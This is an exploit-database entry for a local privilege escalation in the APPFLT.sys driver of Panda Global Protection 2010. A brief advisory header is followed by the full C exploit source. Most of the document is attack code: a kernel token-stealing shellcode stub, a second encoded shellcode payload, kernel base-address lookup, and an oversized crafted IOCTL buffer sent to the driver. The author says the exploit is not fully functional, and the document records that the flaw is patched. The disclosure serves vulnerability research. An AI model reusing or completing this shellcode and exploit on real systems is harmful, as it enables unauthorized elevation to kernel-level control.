header-logo
Suggest Exploit
vendor:
Panda Global Protection 2010
by:
Heurs
7.5
CVSS
HIGH
Local Privilege Escalation
362
CWE
Product Name: Panda Global Protection 2010
Affected Version From: Panda Global Protection 2010 (3.01.00)
Affected Version To: Panda Global Protection 2010 (3.01.00)
Patch Exists: YES
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows
2010

Panda Global Protection 2010 Local Privilege Escalation Vulnerability

APPFLT.sys driver in Panda Global Protection 2010 (3.01.00) does not properly check inputs integers of an IOCTL, allowing for a local privilege escalation. Although the provided exploit is not functional, it can be modified to achieve privilege escalation.

Mitigation:

The vulnerability has been patched in Panda Global Protection 2010. Users should ensure they have the latest version installed.
Source

Exploit-DB raw data:

#include <windows.h>
#include <string.h>
#include <ddk/ntapi.h>
#include <tlhelp32.h>

#define SystemModuleInfo 11

/*
Program          : Panda Global Protection 2010 (3.01.00)
Homepage         : http://www.pandasecurity.com
Discovery        : 2010/04/09
Author Contacted : 2010/07/15
Status of vuln   : Patched !
Found by         : Heurs
This Advisory    : Heurs
Contact          : s.leberre@sysdream.com


//----- Application description


Antivirus Global Protection 2010 is the most complete product, with everything
you need to protect your computer and information. It protects you from viruses,
spyware, rootkits, hackers, online fraud, identity theft and all other Internet
threats. The anti-spam engine will keep your inbox free from junk mail while the
Parental Control feature will keep your family safe when using the Internet. You
can also back up important files (documents, music, photos, etc.) to a CD/DVD or
online (5GB free space available) and restore them in case of accidental loss or
damage. And thanks to the most innovative and new detection technologies and improved
Collective Intelligence, the solution is now much faster than previous versions. 

//----- Description of vulnerability

APPFLT.sys driver don't check inputs integers of an IOCTL. An exception can be 
thrown if we modify one DWORD.
Exploit isn't functional but with few work it can be a local privilege escalation.

//----- Credits

http://www.sysdream.com
http://www.hackinparis.com/
http://ghostsinthestack.org

s.leberre at sysdream dot com
heurs at ghostsinthestack dot org

//----- Greetings

Mysterie

*/


char ShellcodeMaster[] = 
"\x33\xf6\x33\xff\x64\xa1\x24\x01\x00\x00\x8b\x40\x44\x05\x88\x00"
"\x00\x00\x8b\xd0\x8b\x58\xfc\x81\xfb\x41\x41\x41\x41\x75\x02\x8b"
"\xf0\x83\xfb\x04\x75\x02\x8b\xf8\x8b\xd6\x23\xd7\x85\xd2\x75\x08"
"\x8b\x00\x3b\xc2\x75\xde\xeb\x10\x8b\xc7\xb9\x40\x00\x00\x00\x03"
"\xc1\x8b\x00\x8b\xde\x89\x04\x19\xba\x11\x11\x11\x11\xb9\x22\x22"
"\x22\x22\xb8\x3b\x00\x00\x00\x8e\xe0\x0f\x35";

char RealShellcode[] = 
"\x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x15"
"\xf3\x1d\xb8\x83\xeb\xfc\xe2\xf4\xe9\x1b\x59\xb8\x15\xf3\x96\xfd"
"\x29\x78\x61\xbd\x6d\xf2\xf2\x33\x5a\xeb\x96\xe7\x35\xf2\xf6\xf1"
"\x9e\xc7\x96\xb9\xfb\xc2\xdd\x21\xb9\x77\xdd\xcc\x12\x32\xd7\xb5"
"\x14\x31\xf6\x4c\x2e\xa7\x39\xbc\x60\x16\x96\xe7\x31\xf2\xf6\xde"
"\x9e\xff\x56\x33\x4a\xef\x1c\x53\x9e\xef\x96\xb9\xfe\x7a\x41\x9c"
"\x11\x30\x2c\x78\x71\x78\x5d\x88\x90\x33\x65\xb4\x9e\xb3\x11\x33"
"\x65\xef\xb0\x33\x7d\xfb\xf6\xb1\x9e\x73\xad\xb8\x15\xf3\x96\xd0"
"\x29\xac\x2c\x4e\x75\xa5\x94\x40\x96\x33\x66\xe8\x7d\x8d\xc5\x5a"
"\x66\x9b\x85\x46\x9f\xfd\x4a\x47\xf2\x90\x70\xdc\x3b\x96\x65\xdd"
"\x15\xf3\x1d\xb8";

typedef struct _SYSTEM_MODULE_ENTRY
{
    ULONG  Unused;
    ULONG  Always0;
    PVOID  ModuleBaseAddress;
    ULONG  ModuleSize;
    ULONG  Unknown;
    ULONG  ModuleEntryIndex;
    USHORT ModuleNameLength;
    USHORT ModuleNameOffset;
    CHAR   ModuleName [256];
} SYSTEM_MODULE_ENTRY, * PSYSTEM_MODULE_ENTRY;


DWORD GetDataSection(HANDLE ImageBase){
    IMAGE_DOS_HEADER * mDosHeader;
    IMAGE_NT_HEADERS * mNtHeader;
    IMAGE_SECTION_HEADER * mSecHeader;
    int i;
    
    mDosHeader = (PIMAGE_DOS_HEADER) ImageBase;
    if (mDosHeader->e_magic != 0x5A4D) {
        return 0;
    }
    
    mNtHeader = (PIMAGE_NT_HEADERS) (mDosHeader->e_lfanew + ImageBase);
    if (mNtHeader->Signature != 0x00004550) {
        return 0;
    }
    
    mSecHeader = (PIMAGE_SECTION_HEADER) (mDosHeader->e_lfanew + sizeof(IMAGE_NT_HEADERS) + ImageBase);
    for (i=0; i<mNtHeader->FileHeader.NumberOfSections; i++){
        if (!strcmp(mSecHeader->Name, ".data"))
            return mSecHeader->VirtualAddress;
        mSecHeader++;
    }
    
    return 0;
}

PVOID KernelGetModuleBase(PCHAR  pModuleName)
{
    PVOID pModuleBase = NULL;
    PULONG pSystemInfoBuffer = NULL;
    
    NTSTATUS status = STATUS_INSUFFICIENT_RESOURCES;
    ULONG    SystemInfoBufferSize = 0;
    
    status = ZwQuerySystemInformation(SystemModuleInfo,
        &SystemInfoBufferSize,
        0,
        &SystemInfoBufferSize);
    
    if (!SystemInfoBufferSize){
        return NULL;
    }
    
    pSystemInfoBuffer = (PULONG)malloc(SystemInfoBufferSize*2);
    
    if (!pSystemInfoBuffer){
        return NULL;
    }
    
    memset(pSystemInfoBuffer, 0, SystemInfoBufferSize*2);
    
    status = ZwQuerySystemInformation(SystemModuleInfo,
    pSystemInfoBuffer,
    SystemInfoBufferSize*2,
    &SystemInfoBufferSize);
    
    
    if (NT_SUCCESS(status))
    {
        PSYSTEM_MODULE_ENTRY pSysModuleEntry =
        (PSYSTEM_MODULE_ENTRY)((PSYSTEM_MODULE_INFORMATION)(pSystemInfoBuffer))->Module;
        ULONG i;
        
        for (i = 0; i <((PSYSTEM_MODULE_INFORMATION)(pSystemInfoBuffer))->Count; i++)
        {
            if (_stricmp(pSysModuleEntry[i].ModuleName +
                pSysModuleEntry[i].ModuleNameOffset, pModuleName) == 0)
            {
                pModuleBase = pSysModuleEntry[i].ModuleBaseAddress;
                break;
            }
        }
    }
    
    if(pSystemInfoBuffer) {
        free(pSystemInfoBuffer);
    }
    
    return pModuleBase;
} // end KernelGetModuleBase()

int __cdecl main(int argc, char* argv[])
{
    HANDLE hDevice = (HANDLE) 0xffffffff;
    DWORD NombreByte;
    DWORD Crashing[] = {
0xaaaaaaaa, 0xbbbbbbbb, 0xcccccccc, 0xdddddddd,
0xeeeeeeee, 0x11111111, 0x001cfdea, 0x002dc6c0,
0x000000a8, 0x0044005c, 0x00760065, 0x00630069,
0x005c0065, 0x00610048, 0x00640072, 0x00690064,
0x006b0073, 0x006f0056, 0x0075006c, 0x0065006d,
0x005c0031, 0x00720050, 0x0067006f, 0x00610072,
0x0020006d, 0x00690046, 0x0065006c, 0x005c0073,
0x00610050, 0x0064006e, 0x00200061, 0x00650053,
0x00750063, 0x00690072, 0x00790074, 0x0050005c,
0x006e0061, 0x00610064, 0x00470020, 0x006f006c,
0x00610062, 0x0020006c, 0x00720050, 0x0074006f,
0x00630065, 0x00690074, 0x006e006f, 0x00320020,
0x00310030, 0x005c0030, 0x00650057, 0x00500062,
0x006f0072, 0x00790078, 0x0065002e, 0x00650078,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420
        };
    char out[sizeof(Crashing)];
    DWORD ShellcodeToExecute;
    DWORD KernelImageBase;
    DWORD KernelPointerDeref;
    DWORD VirtImageBaseKnl;
    DWORD NullAddress;
    KEVENT NewKevent;
    int i = 0x1000;
    
    printf("Local Privilege Escalation - Panda Global Protection 2010 (3.01.00)\n\n");
    hDevice = CreateFile("\\\\.\\AppFlt",GENERIC_READ|GENERIC_WRITE,0,NULL,OPEN_EXISTING,0,NULL);
    
    ShellcodeToExecute = (DWORD) VirtualAlloc((void*)0x00110000, 0x10000, MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    ShellcodeToExecute = (DWORD) VirtualAlloc((void*)0x00110000, 0x10000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

    
    ShellcodeToExecute = (DWORD) VirtualAlloc((void*)0x19653420, 0x1000, MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    ShellcodeToExecute = (DWORD) VirtualAlloc((void*)0x19653420, 0x1000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    
    memcpy((void*)0x19653420, ShellcodeMaster, sizeof(ShellcodeMaster));
     
    KernelImageBase = (DWORD) KernelGetModuleBase("ntoskrnl.exe");
    
    if (!KernelImageBase){
       KernelImageBase = (DWORD) KernelGetModuleBase("ntkrnlpa.exe");
       VirtImageBaseKnl = (DWORD) LoadLibrary("ntkrnlpa.exe");
       KernelPointerDeref = KernelImageBase + GetDataSection((HANDLE)VirtImageBaseKnl) + 0x3C;
    } else {
       VirtImageBaseKnl = (DWORD) LoadLibrary("ntoskrnl.exe");
       KernelPointerDeref = KernelImageBase + 0x3C;
    }
    
    Crashing[469] = (KernelPointerDeref - 0x750) ^ 0x19653420;
    
    memcpy((PVOID)0x001129f9, &Crashing[60], 4);
    memcpy((PVOID)0x001129f9 + 0x4, &Crashing[60], 4);
    memcpy((PVOID)0x001129f9 + 0x8, &Crashing[60], 4);
    memcpy((PVOID)0x001129f9 + 0xC, &Crashing[60], 4);
    memcpy((PVOID)0x001129f9 + 0x10, &Crashing[60], 4);
    memcpy((PVOID)0x001129f9 + 0x16, &Crashing[60], 4);
    
    DeviceIoControl(hDevice,0x06660E1C,Crashing,sizeof(Crashing),out,sizeof(Crashing),&NombreByte,NULL);
    
    printf("Sploit Send.\nhDevice = %x\n", hDevice);
    CloseHandle(hDevice);
    getch();
    return 0;
}